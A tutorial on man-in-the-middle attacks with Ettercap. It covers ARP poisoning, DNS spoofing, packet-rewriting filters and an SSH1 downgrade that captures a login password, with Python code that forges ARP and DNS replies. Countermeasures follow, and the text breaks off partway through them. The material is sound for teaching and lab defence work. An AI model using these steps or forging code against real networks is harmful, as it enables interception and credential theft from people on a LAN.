Ettercap is a tool written by Alberto Ornaghi (ALoR) and Marco Valleri (NaGA); it is essentially a suite for man-in-the-middle attacks on a LAN. For those who do not like the Command Line Interface (CLI), it also comes with an easy graphical interface. Ettercap performs attacks against the ARP protocol to position itself as "man in the middle" and, once in that position, it is able to:
- inject, replace or delete data in a connection
- collect passwords for protocols such as FTP, HTTP, POP, SSH1, etc.
- present fake SSL certificates to the victims of HTTPS sessions
- etc.
Plugins are also available for attacks such as DNS spoofing.

What is a "man in the middle" attack? It is an attack where the pirate inserts his machine in the logical path between two machines that are talking to each other, as shown in the picture below. Once in this position, the pirate can launch many different and very dangerous attacks, because all the traffic between the two normal machines passes through him. There are several ways to become "man in the middle"; in this tutorial we will look at attacks based on the ARP protocol.

The ARP protocol is used to translate IP addresses into the physical addresses of network cards, the MAC addresses (e.g. 0fe1.2ab6.2398). Although it carries IP addresses, ARP is not an IP protocol: ARP packets travel directly inside Ethernet frames (EtherType 0x0806), which is why it is usually placed at layer 2 (the link layer) rather than at layer 3. When a device wants to reach a network resource, it first sends a broadcast request asking which device owns the IP address it wants to reach, and the owner answers with its MAC address. The caller keeps the IP - MAC association in a cache, the ARP cache, to speed up later connections to the same IP address. The attack comes when a machine asks the others for the MAC address associated with an IP address: the pirate answers the caller with fake packets saying that this IP address is associated with his own MAC address, and in this way "short-cuts" the real IP - MAC answer coming from the legitimate host. In practice Ettercap does not even wait for a request: it keeps sending unsolicited ARP replies, which most stacks accept to refresh an entry already present in their cache.
This attack is referred to as ARP poisoning or ARP spoofing. It is possible only if the pirate and the victims are inside the same broadcast domain, i.e. the same IP subnet, which is defined on each host by its IP address and subnet mask (in our case study all three hosts are in the 192.168.1.x network). In our tutorial we will use the case study below, where a machine with IP 192.168.1.2 (Windows) reaches Internet resources from a local network through the router 192.168.1.1. After the ARP poisoning attack, the Ettercap machine with IP 192.168.1.100 is set as "man in the middle".

Please note the following things about the Ettercap machine behaviour:

- Every time Ettercap starts, it disables IP forwarding in the kernel and begins to forward packets itself (if the kernel kept forwarding too, every packet would be sent twice). This can slow down network performance between the two hosts because of the time each packet spends being processed on the Ettercap machine.
- Ettercap needs root privileges to open the link-layer sockets. After the initialization phase the root privileges are not needed anymore, so Ettercap drops them to UID = 65535 (nobody); the user it drops to can be changed with ec_uid in etter.conf.
- Since Ettercap has to write (create) log files, it must be executed from a directory with the right permissions, i.e. one writable by that unprivileged user.

The goal of our tutorial is to warn about the danger of "man in the middle" attacks by ARP spoofing. In the ARP poisoning tutorial we explain how to configure the Ettercap machine as "man in the middle"; then, in the filtering tutorial, we show some attacks. Finally, some countermeasures are given to fight against these ARP poisoning attacks.

An interview with the Ettercap authors can be found on the newsforge website. It is slightly out of date (2004) but remains interesting.

In this first tutorial we place our Ettercap machine as "man in the middle" by means of an ARP spoofing attack. The network scenario diagram is available in the Ettercap introduction page. The first thing to do is to set an IP address on your Ettercap machine in the same IP subnet as the machines you want to poison. For our tutorial the IP address 192.168.1.100 is used. See the networking tutorial for detailed explanations about how to set an IP address on your Linux box. As a reminder, Ettercap needs root access to be launched; afterwards it drops its privileges and runs as the 'nobody' user.





Open Ettercap in graphical mode

#ettercap -G

Select the sniff mode

Sniff -> Unified sniffing
Then choose the network interface to sniff on (eth0 in our case).

Scan for hosts inside your subnet

Hosts -> Scan for hosts
The network range scanned is determined by the IP settings of the interface you chose in the previous step.

See the MAC & IP addresses of the hosts inside your subnet

Hosts -> Hosts list

Select the machines to poison

We chose to ARP poison only the Windows machine 192.168.1.2 and the router 192.168.1.1.
Highlight the line containing 192.168.1.2 and click on the "Add to Target 1" button.
Highlight the line containing 192.168.1.1 and click on the "Add to Target 2" button.
If you do not select any machine as target, all the machines inside the subnet will be ARP poisoned.

Check your targets

Targets -> Current targets

Start the ARP poisoning

Mitm -> Arp poisoning
If you want to intercept the Windows machine's connections to hosts beyond the router (Internet traffic), tick "Sniff remote connections" in the dialog before clicking OK.

Start the sniffer

Start -> Start sniffing
Finally, the sniffer is started to collect statistics and to pass the traffic through the filters and plugins described in the next tutorial.

ARP TRAFFIC:

On the Windows machine, with the help of Wireshark, we can compare the ARP traffic before and after the poisoning. As a reminder (see the network diagram):

192.168.1.1    (Router)   11:22:33:44:11:11
192.168.1.2    (Windows)  11:22:33:44:55:66
192.168.1.100  (Pirate)   11:22:33:44:99:99

Before the poisoning

Before being able to communicate together, the router and the Windows machine each send an ARP broadcast to find the MAC address of the other, and each gets a unicast reply:

No  Source             Destination        Prot  Info
1   11:22:33:44:55:66  Broadcast          ARP   Who has 192.168.1.1? Tell 192.168.1.2
2   11:22:33:44:11:11  11:22:33:44:55:66  ARP   192.168.1.1 is at 11:22:33:44:11:11
3   11:22:33:44:11:11  Broadcast          ARP   Who has 192.168.1.2? Tell 192.168.1.1
4   11:22:33:44:55:66  11:22:33:44:11:11  ARP   192.168.1.2 is at 11:22:33:44:55:66

After the poisoning

No  Source             Destination        Prot  Info
1   11:22:33:44:11:11  Broadcast          ARP   Who has 192.168.1.2? Tell 192.168.1.1
2   11:22:33:44:55:66  11:22:33:44:11:11  ARP   192.168.1.2 is at 11:22:33:44:55:66
3   11:22:33:44:99:99  11:22:33:44:55:66  ARP   192.168.1.1 is at 11:22:33:44:99:99
4   11:22:33:44:99:99  11:22:33:44:55:66  ARP   192.168.1.1 is at 11:22:33:44:99:99

The router's ARP broadcast request is answered by the Windows machine exactly as in the previous capture. The difference between the two captures is that there is no longer any request from Windows (192.168.1.2) to find the MAC address of the router (192.168.1.1), because the poisoner continuously sends unsolicited ARP replies telling the Windows machine that 192.168.1.1 is associated with its own MAC address (11:22:33:44:99:99) instead of the router's (11:22:33:44:11:11). The same thing happens in the other direction towards the router, which a capture on the Windows machine cannot show.

ARP TABLES:

Let's see if we successfully poisoned the ARP tables of the router and of the Windows machine.

-------------------- Windows machine 192.168.1.2 --------------------
Launch a command line interface window as follows: Start -> Run -> cmd

C:\Documents and Settings\administrator>arp -a
Interface: 192.168.1.2 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           11-22-33-44-99-99     dynamic
  192.168.1.100         11-22-33-44-99-99     dynamic

-------------------- Linux machine 192.168.1.100 --------------------
#arp -a
? (192.168.1.1) at 11:22:33:44:11:11 [ether] on eth0
? (192.168.1.2) at 11:22:33:44:55:66 [ether] on eth0

-------------------- Router 192.168.1.1 --------------------
router>show arp
Protocol  Address        Age (min)  Hardware Addr   Type  Interface
Internet  192.168.1.2    194        1122.3344.9999  ARPA  FastEthernet0/0
Internet  192.168.1.100  128        1122.3344.9999  ARPA  FastEthernet0/0

If you have a Netscreen (Juniper) device, use the following command to display the ARP table:
>get arp
On a Vyatta router:
>show arp

In the router and Windows tables we see that the Ettercap Linux machine poisoned their ARP caches and replaced the MAC address of the Windows machine, respectively of the router, by its own MAC address. Only the Ettercap machine still holds the real IP - MAC correspondences, which it needs to forward the traffic. This means that the packets between the Windows machine and the router now transit through the Ettercap machine.

STOPPING THE ARP SPOOFING:

Ettercap is pretty effective. When you stop the attack (Mitm -> Stop mitm attack(s)), it will "re-arp" the victims, i.e. send them the real MAC addresses, so that their ARP caches again contain correct entries:

router>show arp
Protocol  Address        Age (min)  Hardware Addr   Type  Interface
Internet  192.168.1.2    194        1122.3344.5566  ARPA  FastEthernet0/0
Internet  192.168.1.100  128        1122.3344.9999  ARPA  FastEthernet0/0

If the cache still contains poisoned IP - MAC correspondences, you can either wait some minutes, which is the time needed for the ARP cache entry to expire and be refreshed, or, better, clear the ARP cache:

On a Microsoft machine:
C:\Documents and Settings\admin>arp -d *
On an Ubuntu or Debian Linux:
#arp -d ip_address
On a Cisco router:
#clear arp-cache
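The exchange shown in the two captures, as an added Python example (it is not part of the original tutorial and not Ettercap's code): it builds the raw ARP frames that appear in the captures, parses them the way a victim's stack does, and replays them against a small model of the Windows machine's ARP cache, giving its state before the attack, while poisoned, and after the re-arp. The addresses are those of the diagram; the cache model (replies accepted only for IPs already known or requested) and the frame contents are assumptions.

```python
import struct

BROADCAST = "ff:ff:ff:ff:ff:ff"
ARP_REQUEST, ARP_REPLY = 1, 2

# Addresses of the case study (the tutorial's network diagram)
ROUTER_IP, ROUTER_MAC = "192.168.1.1", "11:22:33:44:11:11"
WIN_IP, WIN_MAC = "192.168.1.2", "11:22:33:44:55:66"
PIRATE_IP, PIRATE_MAC = "192.168.1.100", "11:22:33:44:99:99"


def _mac(mac):
    return bytes.fromhex(mac.replace(":", ""))


def _ip(ip):
    return bytes(int(octet) for octet in ip.split("."))


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an ARP packet (RFC 826), 42 bytes.
    Requests go to the broadcast MAC, replies are unicast to the target."""
    eth_dst = BROADCAST if op == ARP_REQUEST else target_mac
    ethernet = _mac(eth_dst) + _mac(sender_mac) + b"\x08\x06"   # EtherType ARP
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)            # Ethernet/IPv4, 6+4 byte addresses
    arp += _mac(sender_mac) + _ip(sender_ip) + _mac(target_mac) + _ip(target_ip)
    return ethernet + arp


def parse_arp(frame):
    """Decode the fields a victim's stack (and Wireshark) looks at."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        raise ValueError("not an ARP frame")
    fmt_mac = lambda b: ":".join("%02x" % x for x in b)
    fmt_ip = lambda b: ".".join(str(x) for x in b)
    return {
        "eth_dst": fmt_mac(frame[0:6]), "eth_src": fmt_mac(frame[6:12]),
        "op": struct.unpack("!H", frame[20:22])[0],
        "sender_mac": fmt_mac(frame[22:28]), "sender_ip": fmt_ip(frame[28:32]),
        "target_mac": fmt_mac(frame[32:38]), "target_ip": fmt_ip(frame[38:42]),
    }


class ArpCache:
    """Minimal model (an assumption, not any real stack) of a victim's ARP cache.
    It learns from replies it asked for and, like common stacks, also overwrites
    an EXISTING entry when an unsolicited reply arrives. That second behaviour is
    what poisoning abuses; a reply about an IP the host never cached is ignored."""

    def __init__(self, ip, mac):
        self.ip, self.mac = ip, mac
        self.table = {}          # ip -> mac
        self.pending = set()     # IPs we have an outstanding request for

    def request(self, target_ip):
        self.pending.add(target_ip)
        return build_arp(ARP_REQUEST, self.mac, self.ip, "00:00:00:00:00:00", target_ip)

    def receive(self, frame):
        p = parse_arp(frame)
        for_me = p["eth_dst"] in (self.mac, BROADCAST) and p["target_ip"] == self.ip
        if not for_me or p["op"] != ARP_REPLY:
            return
        if p["sender_ip"] in self.pending or p["sender_ip"] in self.table:
            self.table[p["sender_ip"]] = p["sender_mac"]
            self.pending.discard(p["sender_ip"])


def run_case_study():
    """Replay the capture seen on the Windows machine: legitimate exchange,
    poisoning by the pirate, then the re-arp sent when the attack is stopped.
    Returns the three successive states of the Windows ARP table."""
    windows = ArpCache(WIN_IP, WIN_MAC)
    windows.request(ROUTER_IP)                 # "Who has 192.168.1.1? Tell 192.168.1.2"
    windows.receive(build_arp(ARP_REPLY, ROUTER_MAC, ROUTER_IP, WIN_MAC, WIN_IP))
    before = dict(windows.table)
    # poisoner: repeated unsolicited replies "192.168.1.1 is at 11:22:33:44:99:99"
    for _ in range(3):
        windows.receive(build_arp(ARP_REPLY, PIRATE_MAC, ROUTER_IP, WIN_MAC, WIN_IP))
    poisoned = dict(windows.table)
    # stop mitm: the victim is re-arped with the router's real MAC
    windows.receive(build_arp(ARP_REPLY, ROUTER_MAC, ROUTER_IP, WIN_MAC, WIN_IP))
    restored = dict(windows.table)
    return before, poisoned, restored


if __name__ == "__main__":
    for label, table in zip(("before", "poisoned", "re-arped"), run_case_study()):
        print(label, table)
```

Running the script prints the three table states; the interesting line is the second one, where 192.168.1.1 resolves to the pirate's MAC although the router never sent that reply.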

CONCLUSION

After this tutorial, the ARP tables of the router and of the Windows machine are poisoned: the Linux machine is now "in the middle". The victims' ARP caches have been changed to force the connections from the Windows machine to go through the Ettercap machine to reach their destination. To launch attacks, go on with the Ettercap filter tutorial.

FILTER – MITM

After the ARP poisoning tutorial, we are ready to perform "man in the middle" attacks, in other words to modify or filter the packets coming from or going to the victim machine. Remember that you need to follow the ARP poisoning tutorial before doing the steps below. The network scenario diagram is available in the Ettercap introduction page. To launch attacks, you can either use an Ettercap plugin or load a filter created by yourself:

1. PLUGINS
2. FILTERS

PLUGINS

We will use here the Ettercap plugin called dns_spoof to test a very famous attack, DNS spoofing, where the pirate answers DNS requests in the place of the DNS server. When you access your favourite web site with your browser, your machine (192.168.1.2 in our case study) first asks the DNS server for the IP address matching your URL, then the browser displays the web page. With DNS spoofing, the spoofer answers in the place of the DNS server and provides another IP address: since the Ettercap machine is on the path, it sees the query first and its forged reply reaches the client before the legitimate one, which the client then ignores. The consequence is that you have the feeling of reaching the desired web site, but because of the different IP address it is in fact the pirate's web site. The attack can be very dangerous when the pirate spoofs important web sites such as your bank's: the fake web server will have exactly the same interface as the real bank site and, once the trap is set, the pirate waits for you to enter your credentials on his site to capture them.

Let's proceed with the DNS spoofing attack. The first thing to do is to set the configuration file called etter.dns in the /usr/share/ettercap/ directory:

#vim /usr/share/ettercap/etter.dns

In the file you can find an explanation about its configuration. Here is the content of our etter.dns file:

www.linux1.org    A    198.182.196.56
*.linux1.org      A    198.182.196.56
www.linux.org     PTR  198.182.196.56

The A lines mean that when you open www.linux1.org (or any other name under linux1.org, thanks to the wildcard) in your web browser, the spoofed answer is 198.182.196.56 and you will see the content of the www.linux.org web site. The PTR line gives the name to answer when the DNS request is a reverse lookup (PTR) for 198.182.196.56; wildcards are not allowed in PTR entries.

To start the DNS spoofing, you need to activate the dns_spoof plugin in the Ettercap graphical interface:

Plugins -> Manage the plugins
Click on the dns_spoof line to activate it. This will tag the line with a "*".

Then enter www.linux1.org in a web browser on the client machine. You can see that the content of the page opened is the one that matches the IP address you added in the etter.dns file, and not the real IP address of www.linux1.org.

To stop the DNS spoofing:

Plugins -> Manage the plugins, and click on the dns_spoof line again to deactivate it.
Start -> Stop sniffing

Although we stopped the attack, www.linux1.org in your web browser still displays the content of the www.linux.org web site. This is because of the DNS cache on our client machine 192.168.1.2: the spoofed answer stays in the cache until it expires, which took about 5 minutes in our test. So either you wait quietly for 5 minutes or, better, you flush the DNS cache.

On Windows, launch a command line interface window as follows: Start -> Run -> cmd
C:\Documents and Settings\administrator>ipconfig /flushdns
To see your DNS cache:
C:\Documents and Settings\administrator>ipconfig /displaydns
On an Ubuntu machine use the following command:
#/etc/init.d/dns-clean start

If you want to change the default DNS cache time on Windows, you have to modify an entry in the Windows registry. Be careful when playing with the registry: an incorrect configuration can damage your system and prevent it from rebooting. Start -> Run -> regedit, then browse to:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\

Click on "NegativeCacheTime" in the right panel (300 seconds by default on Windows XP), click on the "Decimal" button and finally enter your new value in seconds. Note that this value only governs how long a failed lookup is remembered; the lifetime of a positive answer such as the spoofed one is the TTL carried in the reply, capped by the "MaxCacheTtl" value (a DWORD in seconds, one day by default) in the same key.
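The spoofing mechanism in code, as an added Python example (not the dns_spoof plugin's source): an etter.dns parser implementing the exact, wildcard and PTR matching described above, a constructed DNS query such as the client's resolver would send, and the forged reply built for it. The rule file is the one from this tutorial, reproduced as sample input; the transaction ID, the 3600-second TTL and the single-answer reply format are assumptions.

```python
import fnmatch
import struct

QTYPE_A, QTYPE_PTR = 1, 12

# Sample input in etter.dns syntax (the rules used above, embedded for an offline run)
ETTER_DNS = """
# name              type  address
www.linux1.org      A     198.182.196.56
*.linux1.org        A     198.182.196.56
www.linux.org       PTR   198.182.196.56
"""


def load_rules(text):
    """Parse etter.dns lines: '<name> <A|PTR> <ip>'; '#' starts a comment."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            name, rtype, addr = line.split()
            rules.append((name.lower(), rtype.upper(), addr))
    return rules


def encode_name(name):
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"


def decode_name(msg, off):
    """Read a DNS name at offset off; returns (name, offset after it).
    Handles a compression pointer (0xC0xx) at the start of a label."""
    labels = []
    while True:
        length = msg[off]
        off += 1
        if length == 0:
            break
        if length & 0xC0:
            ptr = struct.unpack("!H", msg[off - 1:off + 1])[0] & 0x3FFF
            return decode_name(msg, ptr)[0], off + 1
        labels.append(msg[off:off + length].decode())
        off += length
    return ".".join(labels), off


def build_query(qname, qtype, txid=0x1234):
    """What the victim's resolver sends (constructed, nothing goes on the wire)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD set, one question
    return header + encode_name(qname) + struct.pack("!HH", qtype, 1)


def parse_query(msg):
    txid, flags, qdcount = struct.unpack("!HHH", msg[:6])
    if flags & 0x8000 or qdcount != 1:       # a response, or not a simple query
        return None
    qname, off = decode_name(msg, 12)
    qtype, _qclass = struct.unpack("!HH", msg[off:off + 4])
    return {"id": txid, "qname": qname.lower(), "qtype": qtype, "question": msg[12:off + 4]}


def match_rule(rules, qname, qtype):
    """dns_spoof-style lookup: A queries match exact or wildcard names; PTR queries
    are matched on the IP encoded in the in-addr.arpa name (no wildcard for PTR)."""
    if qtype == QTYPE_A:
        for name, rtype, addr in rules:
            if rtype == "A" and fnmatch.fnmatchcase(qname, name):
                return addr
    elif qtype == QTYPE_PTR and qname.endswith(".in-addr.arpa"):
        ip = ".".join(reversed(qname[:-len(".in-addr.arpa")].split(".")))
        for name, rtype, addr in rules:
            if rtype == "PTR" and addr == ip:
                return name
    return None


def forge_response(rules, query, ttl=3600):
    """Return the spoofed reply the man-in-the-middle races back to the client,
    or None when no rule matches (then only the real server answers)."""
    q = parse_query(query)
    if q is None:
        return None
    answer = match_rule(rules, q["qname"], q["qtype"])
    if answer is None:
        return None
    rdata = bytes(int(o) for o in answer.split(".")) if q["qtype"] == QTYPE_A else encode_name(answer)
    header = struct.pack("!HHHHHH", q["id"], 0x8180, 1, 1, 0, 0)   # QR, RD, RA; one answer
    rr = b"\xc0\x0c" + struct.pack("!HHIH", q["qtype"], 1, ttl, len(rdata)) + rdata
    return header + q["question"] + rr


def first_answer(response):
    """Decode the rdata of the first answer: an IPv4 string for A, a name for PTR."""
    _, off = decode_name(response, 12)
    off += 4                                   # skip qtype + qclass
    _, off = decode_name(response, off)        # answer name (the compression pointer)
    rtype, _, _, rdlen = struct.unpack("!HHIH", response[off:off + 10])
    off += 10
    rdata = response[off:off + rdlen]
    return ".".join(str(b) for b in rdata) if rtype == QTYPE_A else decode_name(response, off)[0]
```

Note that a query for www.linux.org itself gets no forged reply: only the names listed in the rule file are spoofed, the real site keeps resolving normally, and the forged reply reuses the client's transaction ID, which is all a resolver of that era checked before accepting an answer.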

FILTERS

The filters allow you to change the content of packets, i.e. to modify or drop packets passing through the "man in the middle". You can find some predefined examples in the /usr/share/ettercap/ directory. A filter is written in a text file which must then be compiled with etterfilter before Ettercap can load it. We will study two examples based on Ettercap filters:

1. FTP prompt change
2. SSH downgrade attack

1. FTP prompt change

We chose, in this simple example, to change the banner (prompt) of an FTP connection. Below is our filter source file, called etter_filter, in the /usr/share/ettercap directory:

# replace the FTP prompt
if (tcp.src == 21 && search(DATA.data, "ProFTPD")) {
   replace("ProFTPD", "TeddyBear FTPD");
}

"tcp.src == 21" matches the packets whose source port is 21, i.e. those sent by the FTP server. Then compile the file with etterfilter, because Ettercap can only load compiled filters:

#etterfilter etter_filter -o etter_filter_compil

This creates a compiled file called etter_filter_compil. Load it in Ettercap:

Filters -> Load a filter, then select the compiled file.

(Of course, you must already be set as "man in the middle"; if it's not already the case, follow the ARP poisoning tutorial first.)

Now it's time to test an FTP connection from our client machine 192.168.1.2, before and after the filter is loaded. ("xyz" is the web site name and "1.2.3.4" an IP address.)

Before the Ettercap filtering:
C:\Documents and Settings\Administrator>ftp www.xyz.com
Connected to xyz.com.
220 ProFTPD 1.3.0a Server (ProFTPD) [1.2.3.4]
User (xyz.com:(none)):

After the Ettercap filtering:
C:\Documents and Settings\Administrator>ftp www.xyz.com
Connected to xyz.com.
220 TeddyBear FTPD 1.3.0a Server (TeddyBear FTPD) [1.2.3.4]
User (xyz.com:(none)):

Note that the replacement string is longer than the original: Ettercap accepts this and keeps the TCP sequence numbers of the following packets consistent for both ends, so neither the client nor the server notices the change in length.

2. SSH downgrade attack

A particularly crafty attack, the "downgrade attack", can be used once in the "man in the middle" position. The principle is to change data inside packets so that the two ends negotiate another version of the protocol, one known to be vulnerable. SSH is the most famous example: the attacker forces the client and the server to use the insecure SSH1 protocol.

---------------- Principle ----------------

The client opens a connection to the SSH server, which answers with a version banner announcing what it supports:
- SSH-1.99: the server supports SSH1 and SSH2
- SSH-2.xx: the server supports only SSH2
- SSH-1.51: the server supports only SSH1

In our case study the server is configured to support both SSH1 and SSH2, and the client is set to use SSH2 and SSH1 with SSH2 as a preference. The hacker changes the server's answer by modifying the "1.99" string to "1.51", to tell the client that the server supports only SSH1 and thus force the client to open an SSH1 link. The client, which thinks it is using the secure SSH2 protocol, logs in with SSH1 and the password is immediately captured by the hacker: Ettercap's SSH1 dissector performs a full man-in-the-middle on the SSH1 key exchange, substituting its own RSA keys for the server's, and can therefore decrypt the whole session. The client only gets a host key warning if it already had the server's SSH1 key cached.

---------------- Case Study Installation ----------------

a. SSH server: OpenSSH on Linux
b. SSH client: PuTTY on Windows
c. Hacker machine: Ettercap

a. Server installation:

#apt-get install openssh-server

By default, only SSH2 is enabled on the OpenSSH server. To activate SSH1, you first have to open the /etc/ssh/sshd_config file and update the line beginning with "Protocol":

#vim /etc/ssh/sshd_config
Protocol 2,1

You then need to create an SSH1 host key pair, otherwise you will get the following error after the SSH server restart:

Disabling protocol version 1. Could not load host key.

#ssh-keygen -t rsa1 -f /etc/ssh/ssh_host_key -N ""

Add the key path into the sshd_config file:

HostKey /etc/ssh/ssh_host_key

Finally, restart the server:

#/etc/init.d/ssh restart
 * Restarting OpenBSD Secure Shell server sshd

The SSH server is now configured to accept SSH1 and SSH2 and thus provides an "SSH-1.99" banner. We can check it with the following command:

#telnet server_ip_address 22
Trying server_ip_address...
Connected to server_ip_address.
Escape character is '^]'.
SSH-1.99-OpenSSH_4.6p1 Debian-5ubuntu0.1

(OpenSSH 7.4 and later no longer contain SSH1 server support at all, so reproducing this laboratory requires an old release such as the one shown here.)

b. Client installation:

Download the PuTTY client. PuTTY is a well known open source SSH client for Windows. Keep the default PuTTY configuration of that time: SSH1 and SSH2 are accepted, but SSH2 is preferred. (Recent PuTTY versions default to SSH-2 only, which is precisely the countermeasure given below.)

c. Ettercap installation:

Follow the Ettercap installation tutorial to install Ettercap, and the ARP poisoning tutorial to set our machine as "man in the middle".

Our laboratory is now operational; we can launch the SSH downgrade attack.

---------------- Launch the SSH downgrade attack ----------------

Ettercap offers a predefined filter source file for the SSH downgrade attack, /usr/share/ettercap/etter.filter.ssh. We can check the content of the file, but nothing has to be modified:

#cat /usr/share/ettercap/etter.filter.ssh
if (ip.proto == TCP) {
   if (tcp.src == 22) {
      if ( replace("SSH-1.99", "SSH-1.51") ) {
         msg("[SSH Filter] SSH downgraded from version 2 to 1\n");
      } else {
         if ( search(DATA.data, "SSH-2.00") ) {
            msg("[SSH Filter] Server supports only SSH version 2\n");
         } else {
            if ( search(DATA.data, "SSH-1.51") ) {
               msg("[SSH Filter] Server already supports only version 1\n");
            }
         }
      }
   }
}

"SSH-1.99" and "SSH-1.51" have the same length, so this replacement never changes the packet size. We just need to compile the file to create the filter:

#etterfilter etter.filter.ssh -o etter_filter_ssh_co

We are now ready to load the filter: Filters -> Load a filter, then select the compiled file. The filter is now loaded.

The client, the hacker and the server machines are now configured correctly. We can test by opening an SSH link from the PuTTY client: open PuTTY, click on "Session" on the left, enter the SSH server IP address (192.168.1.68 in our example), check the "SSH" radio button and click on the "Open" button to connect to the SSH server.

It's time to see if everything is working fine and check on the hacker machine whether we catch the SSH1 password. Ettercap has:

1. Downgraded the SSH version:
[SSH Filter] SSH downgraded from version 2 to 1

2. Captured the SSH1 credentials:
SSH : 192.168.1.68:22 -> USER:guillfab  PASS:T0rduT1m

We can also observe a Wireshark capture taken on the SSH server during the SSH link establishment:

1. The server (192.168.1.68) sends an "SSH-1.99" banner to the client (192.168.1.132), meaning it supports SSH1 and SSH2.
2. The client establishes an SSH1 link, because the "1.99" server answer was changed to "1.51" by the hacker.
3. Encrypted SSH1 packets follow.

The attack works fine!

---------------- Countermeasures ----------------

How to avoid SSH downgrade attacks? SSH1 must NEVER be enabled on an SSH server, and SSH2 must be forced on the client. By default, only SSHv2 is enabled on the OpenSSH server, while it is frequent to see SSHv1 and SSHv2 both enabled on clients such as PuTTY. Let's see how we can secure the SSH client and server.

SSH server: Open the /etc/ssh/sshd_config file and check that only the SSH2 protocol is enabled:

#vim /etc/ssh/sshd_config
Protocol 2

If you make a change, restart the server with "#/etc/init.d/ssh restart". Then, to be sure your server really supports only SSH2, run the following command:

#telnet server_ip_address 22
Trying server_ip_address...
Connected to server_ip_address.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.6p1 Debian-5ubuntu0.1

The banner must now start with "SSH-2.0", not "SSH-1.99".

SSH client: Force the SSH2 protocol on the client. On PuTTY, in the left panel, click on "Connection" then "SSH", and check the "2 only" radio button. A client configured this way refuses the downgraded "SSH-1.51" banner instead of silently falling back to SSH1.
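The FTP prompt filter and the SSH downgrade filter modelled in Python, as an added example that is neither Ettercap's filter engine nor the shipped filter files. It shows the part the filter language hides: when a replace() makes the server's payload longer, the man in the middle has to shift the sequence numbers of the server's later packets and the acknowledgements coming back from the client, otherwise one of the two ends would see a gap. It also models the "2 only" client setting from the countermeasures. The port numbers, sequence numbers, the FTP greeting and the banners are constructed; the one deliberate deviation from the shipped SSH filter is commented in the code.

```python
from dataclasses import dataclass


@dataclass
class Packet:
    """The TCP fields the filter engine needs; everything else is left out."""
    src_port: int
    dst_port: int
    seq: int
    ack: int
    payload: bytes


def ftp_filter(payload):
    """The etter_filter of the FTP example: rewrite the ProFTPD greeting."""
    if b"ProFTPD" in payload:
        return payload.replace(b"ProFTPD", b"TeddyBear FTPD"), "[FTP Filter] prompt replaced"
    return payload, None


def ssh_filter(payload):
    """Same logic as etter.filter.ssh. One difference: the shipped file searches
    for "SSH-2.00", a string OpenSSH never sends (its banner is "SSH-2.0-..."),
    so that branch is matched here on "SSH-2.0" instead."""
    if b"SSH-1.99" in payload:
        return payload.replace(b"SSH-1.99", b"SSH-1.51"), "[SSH Filter] SSH downgraded from version 2 to 1"
    if b"SSH-2.0" in payload:
        return payload, "[SSH Filter] Server supports only SSH version 2"
    if b"SSH-1.51" in payload:
        return payload, "[SSH Filter] Server already supports only version 1"
    return payload, None


FILTERS = {21: ftp_filter, 22: ssh_filter}     # keyed on tcp.src of the server


class MitmFilter:
    """Applies the per-port filters to packets crossing the man in the middle and
    keeps the TCP sequence space consistent when a replace() changes the payload
    length: bytes added in the server->client direction shift the seq of later
    server packets, and must be subtracted from the client's acks before they
    reach the real server."""

    def __init__(self):
        self.delta = {}     # (server_port, client_port) -> bytes added so far
        self.log = []

    def process(self, pkt):
        if pkt.src_port in FILTERS:                        # server -> client
            key = (pkt.src_port, pkt.dst_port)
            seq = pkt.seq + self.delta.get(key, 0)        # shift by earlier insertions
            payload, msg = FILTERS[pkt.src_port](pkt.payload)
            if msg:
                self.log.append(msg)
            self.delta[key] = self.delta.get(key, 0) + len(payload) - len(pkt.payload)
            return Packet(pkt.src_port, pkt.dst_port, seq, pkt.ack, payload)
        if pkt.dst_port in FILTERS:                        # client -> server
            key = (pkt.dst_port, pkt.src_port)
            ack = pkt.ack - self.delta.get(key, 0)
            return Packet(pkt.src_port, pkt.dst_port, pkt.seq, ack, pkt.payload)
        return pkt


def client_accepts_banner(banner, ssh2_only):
    """The PuTTY "2 only" countermeasure: refuse a server that cannot speak SSH-2.
    1.99 = both versions, 2.0 = SSH-2 only, anything else = SSH-1 only."""
    if not banner.startswith(b"SSH-"):
        return False
    version = banner.split(b"-", 2)[1]
    return version in (b"1.99", b"2.0") or not ssh2_only


FTP_GREETING = b"220 ProFTPD 1.3.0a Server (ProFTPD) [1.2.3.4]\r\n"   # constructed sample


def run_ftp_session():
    """Greeting, the client's ACK and the server's next packet, as each end sees them."""
    mitm = MitmFilter()
    greeting = mitm.process(Packet(21, 50001, 1000, 1, FTP_GREETING))
    # the client acks what it received, i.e. the longer, rewritten greeting
    client_ack = mitm.process(Packet(50001, 21, 1, 1000 + len(greeting.payload), b"USER anonymous\r\n"))
    next_from_server = mitm.process(Packet(21, 50001, 1000 + len(FTP_GREETING), 17, b"331 Anonymous login ok\r\n"))
    return greeting, client_ack, next_from_server


def run_ssh_session(server_banner, client_ssh2_only):
    """Banner as the client sees it, whether the client proceeds, and the filter log."""
    mitm = MitmFilter()
    seen = mitm.process(Packet(22, 50002, 1000, 1, server_banner))
    return seen.payload, client_accepts_banner(seen.payload, client_ssh2_only), mitm.log
```

Two things to take from running it: the FTP greeting grows by 14 bytes (two occurrences of the 7-byte-longer name), and the ack the real server receives is still 1000 + 47, the length it actually sent; and with "2 only" set, the downgraded "SSH-1.51" banner is rejected while a genuine "SSH-2.0" server is still accepted.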

As a general security rule, try never to rely on the default settings, but to force the security level as high as possible both on a server AND on its clients.

COUNTERMEASURES

Fighting effectively against ARP poisoning is not an easy task, because the ARP protocol provides no way to establish the authenticity of the source of incoming packets. Despite this, we propose here some ways to protect your machines against these spoofers:

1. STATIC ARP
2. SURVEILLANCE TOOLS
3. PORT SECURITY
4. CONCLUSION

1. STATIC ARP

Static ARPing means that you manually configure the IP to MAC mappings, so that the cache no longer learns them from the network.

Windows machine

C:\Documents and Settings\administrator>arp -s 192.168.1.1 11-22-33-44-11-11

See your ARP cache table:

C:\Documents and Settings\administrator>arp -a
